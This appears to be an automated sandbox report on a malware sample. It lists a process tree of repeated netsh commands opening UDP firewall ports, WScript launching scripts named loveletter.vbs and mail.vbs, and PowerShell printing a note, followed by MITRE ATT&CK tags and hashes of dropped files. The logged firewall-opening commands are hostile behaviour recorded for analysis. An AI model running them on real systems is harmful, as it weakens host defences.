C:\Windows\system32\netsh.exe (depth 3, PID 3368)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3932)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1108)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 2700)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3184)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2584)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4176)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2292)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2460)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2380)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 912)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3236)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2068)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3104)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3676)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4652)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2352)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3164)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1388)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3764)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2680)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1144)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2024)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4264)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4652)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1328)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4276)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4852)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3960)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4660)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4268)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2720)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4432)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4996)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4196)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4672)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2188)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4640)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2660)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2952)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3324)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4644)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4944)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1168)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3124)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3092)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3148)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 344)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4048)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4980)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3572)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1740)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3344)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4884)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 228)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 248)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2152)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1132)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3572)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1632)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 2976)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 564)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2672)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3684)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3584)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4680)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3224)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3312)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 5060)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\System32\WScript.exe (depth 2, PID 3672)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"

C:\Windows\System32\WScript.exe (depth 2, PID 2568)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 4760)
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 4336)
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\DllHost.exe (depth 1, PID 428)
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\svchost.exe (depth 1, PID 5100)
  C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

C:\Windows\system32\svchost.exe (depth 1, PID 1664)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\SysWOW64\DllHost.exe (depth 1, PID 1464)
  C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\rundll32.exe (depth 1, PID 2980)
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\srchadmin.dll ,

C:\Windows\system32\BackgroundTransferHost.exe (depth 1, PID 4668)
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\system32\svchost.exe (depth 1, PID 4200)
  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\LogonUI.exe (depth 1, PID 3976)
  "LogonUI.exe" /flags:0x4 /state0:0xa38a6055 /state1:0x41c64e6d
Network
MITRE ATT&CK Enterprise v15

Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)

Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)

Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads
- Filesize: 2KB
  MD5: 4ef3b165311abe48029443c0a529747f
  SHA1: ad65cc913ed3805d813bc16337c7f6d2a97b55d9
  SHA256: c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff
  SHA512: 696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a

- Filesize: 64B
  MD5: 5caad758326454b5788ec35315c4c304
  SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
  SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
  SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

- Filesize: 1KB
  MD5: 06749aaa06f6c7945179a4d6987646df
  SHA1: e9a085d7066b30cb8b3f252e18a430f2651e641c
  SHA256: f2834fd2d110fae3fc504311522554154af4e9a1bdf96b20836983ce04135b7f
  SHA512: eba3862fdf9f835398862e511e4acf5f48f4c1f6fa42a96be4012fe968ee2d3b60eb3ee50760d2d0d0c89dfcc1212c5b1dd35fc140069405e39ecba23bb94047

- Filesize: 64B
  MD5: 1003ec7951f3cd028cf121961d35d74f
  SHA1: c4d16f56c324c66b7f190bfc81504741f9583496
  SHA256: a0c7e18c72dfe1dd512a208cf1ed2db19116aa95e9e7daab8a008365cd445659
  SHA512: d97505b38b2e556874341d3695ef0473ab86aa4468df5fe999aa64c91bfcb8d5bf80191eb75b3af6cafc7835ac5b648fbb511aeccb5b555eb54f72dcb276fe26

- Filesize: 64B
  MD5: caf7c8d742be571cc9df52e5fed42eac
  SHA1: 6022d6909c68bccce19eeedd6b95b4c74a4eaffb
  SHA256: 907d59c4a1decc4fcdd1a2614e3884392d7c275f82cc900fe742151b9c9be22c
  SHA512: 9e8f1a4c2b44b8222f5a31e750ca8fa7f0a4fa6a961c03c0ba8746bc3a8b5cdf08ee91fbc607876b7b2e9ea52562dd55a92d488e4b352f930a4214d5fec8be4b

- Filesize: 1KB
  MD5: 73cfb6b874e580b592e2359c08ee0cad
  SHA1: 0d725f149b045d17af78799db668c77665c2c267
  SHA256: 3c1bc34be635363731af91ade6426d1c6753b8fc6beeb77fe2a1d09e9dc2871a
  SHA512: 1c48dcd0f3cbc6199ae511cf965fe3d05447d0d772cc5c97adfb6deac897788738c197533986163567eca714680f3761dfe1de045f4e3a5043d1262405ff1101

- C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ef75e738-cfc5-440e-8855-345fafcb16dd.down_data
  Filesize: 555KB
  MD5: 5683c0028832cae4ef93ca39c8ac5029
  SHA1: 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
  SHA256: 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
  SHA512: aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize: 7B
  MD5: 795fc94569ac1e81adcc0b210d697fac
  SHA1: f24e96080686bbeda4f7c2e144d30fef0570ca00
  SHA256: b966109dc05aef186be134969b24baf913df103280a1f9cd34f858d75fe26e2d
  SHA512: d22e3c8ec7eec35b3b9141bac6940debd08dc28a43cee7f42beacc13564578ad248d662e1b610a8a72462c0b69c4684b1d464b073b720828bafdd528cdd34fdd

- Filesize: 468B
  MD5: 543df538bfe2cdb507cbd92c7e4bc598
  SHA1: a0f3e8ceffa1ff3b5ad9a1b6c2d65d540f2fb54a
  SHA256: 717585ea06e86f43f028a1235c8232c73e2f6fcf241a1df110b75c465271c5f2
  SHA512: f8c1d932a1799feb07c5d5e97cb365e03dbf17376b62588e5c1bf5c7a70a3102dca536f081a374aec9e62054880f7239bb25c8ac70cff54d63b12029bc131437

- Filesize: 7B
  MD5: e210738007a0fdcc9b54fd47cf3d2468
  SHA1: 03fc4f6a8f9f665f5fc3d571a82ba0b68c557a3f
  SHA256: 188a22ee45f76b6cd6b45e8e76b22a26ee20cee384a9aec7ce2288df9c12e53a
  SHA512: 334bfec17a44686c834c56351e7f2141391e3369c96abd3540faec1af3ad529dd2baf6fdd868e4754e4788b927ccc597d0a175355f0dd2794fc288d8e53a6c75

- Filesize: 71B
  MD5: 3544e4b7ac1418d34061648a9f3e3dc6
  SHA1: 30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
  SHA256: db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
  SHA512: 5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

- Filesize: 133B
  MD5: e1aa6baebddf0aff6c4c5083a20a297e
  SHA1: 28815535556ca05f3d7f3d226df8cd5c85fa89c9
  SHA256: d4a7360c572d83e11868d807b02857f84086abd381ffa2e6aff95a1dda490a9e
  SHA512: 62aeaf0f676f5966b90093397e53288ec7b8ccb08b8b29aa8fe47259b683fe29f945c7425605befaf6bea853ec787cbfb9c8ec27880aa3e10290c9df88d79190

- Filesize: 137B
  MD5: 147a38541c3845f2d0a53b18f738eec1
  SHA1: 12775ede4d1765164ff685dfdc9a51d8c66c2400
  SHA256: d6a767002915d5c756b8b39a9db54fbaa4fbedf75a444ec2db810d9468c47f7b
  SHA512: a448da5bea8d47caba326bc54722459504e24469e07e5cac501d435465a9aedb6da12cc9a71a8de4d2915e1348715766fa95b7ef077e403f29ccb6c35f879de0

- Filesize: 8B
  MD5: b94c209cf38063d20d63dc09f2ae873d
  SHA1: 96ef8ac562766a5fc3de84096f35bf977a1d1e5f
  SHA256: 0e71573bb7f2805bc0e30cbbe46e36d3982363ecfeb55a3d411e6d43fa6fd591
  SHA512: 2a72533df58ecde49edca2a5f52ebc850188c503e2e7bbe1781d415d2659f1f2d367486010c728a0de5af9c62b275aa2d89474274dcdc7a058c6b871723dfa62

- Filesize: 359B
  MD5: 2fdfd20af32c8dc255909ebcd44ed51b
  SHA1: 5081d65b5e2001605dd83fc936077eb7f4786724
  SHA256: 0de397da60dd5442348a162261f29d91a93c5b10871d88484813645ada985b57
  SHA512: 65493c00f83a1e5e67bce8297cc546e7b03d2476570d13ba90063813b08eaec0837513093787126beb3dc2c0be54100f6a9f05731ec0a6e664c83f567f8e7d39

- Filesize: 8B
  MD5: 8cd502f5bf8dc075d41a0d5be175a3e1
  SHA1: d4f720a38e935be3e3ce15a427b608ff1f80331d
  SHA256: 37ac4f931651b5deb0a5340d0ee6174fbd606b048ccd6261fe5784c8669d30f4
  SHA512: 877234cc3aed07a6bcac355af1a69a7c0fec7fd751376357cfeac2c1b6360d5349a65f0d427f2eb7defa6370785e262fdd114c7bbb1e6e9453770f1bee480add

- Filesize: 8B
  MD5: 190ee356c0ed5c948cf248dbdd8af6bd
  SHA1: 808ac5f7755bb374cba429217097c47250ba315a
  SHA256: bef70885d9ff36b8490dde2c214bcf9d5bf4631e9bdf69bea5334f89eb72d773
  SHA512: 365c02f05504597dab4bd4c557d510f64367efcbeadfc19847d35efbf425e39de544d10edd21fab91cced1445b61c3813ac5deca64699d7d246dbd7672a927a8

- Filesize: 495B
  MD5: 900ead69492d80e48738921eca28b14f
  SHA1: 6b51607c54f8e734a7ea47091859c3e8dce6365c
  SHA256: c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
  SHA512: 8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

- Filesize: 488B
  MD5: 88ef4bc3f48eeb97aedadff8f3840980
  SHA1: 48e8167bef2562d902885a075f6190d269fd3d35
  SHA256: b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
  SHA512: 523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024